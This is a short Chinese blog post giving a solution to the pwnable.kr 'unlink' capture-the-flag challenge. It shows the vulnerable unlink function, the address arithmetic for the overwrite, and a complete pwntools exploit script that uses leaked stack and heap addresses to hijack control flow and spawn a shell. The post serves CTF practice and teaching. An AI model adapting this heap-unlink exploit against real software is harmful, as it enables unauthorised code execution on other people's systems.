[Toddler's Bottle]-unlink

2018-12-10  本文已影响0人  2mpossible
void unlink(OBJ* P){
    OBJ* BK;
    OBJ* FD;
    BK=P->bk;
    FD=P->fd;
    FD->bk=BK;
    BK->fd=FD;
}
FD -> bk = heap_addr + 12 + 4 = heap_addr + 16 = BK = ebp-4
BK -> fd = ebp-4 = FD = heap_addr + 12

exp:

from pwn import *

p = process('./unlink')

p.recvuntil('leak: 0x')
stack_addr = int(p.recvuntil('\n',drop = True),16)
log.success('stack addr : 0x%x'%stack_addr)
p.recvuntil('leak: 0x')
heap_addr = int(p.recvuntil('\n',drop = True),16)
log.success('heap addr : 0x%x'%heap_addr)

system_addr = 0X080484EB
ebp_4 = stack_addr + 16


payload = p32(system_addr) + 'a'*4 + p32(0) + p32(0x19) 
payload += p32(heap_addr+12) + p32(ebp_4)
#gdb.attach(p)
p.recvuntil('shell!\n')
p.sendline(payload)

p.interactive()
上一篇 下一篇

猜你喜欢

热点阅读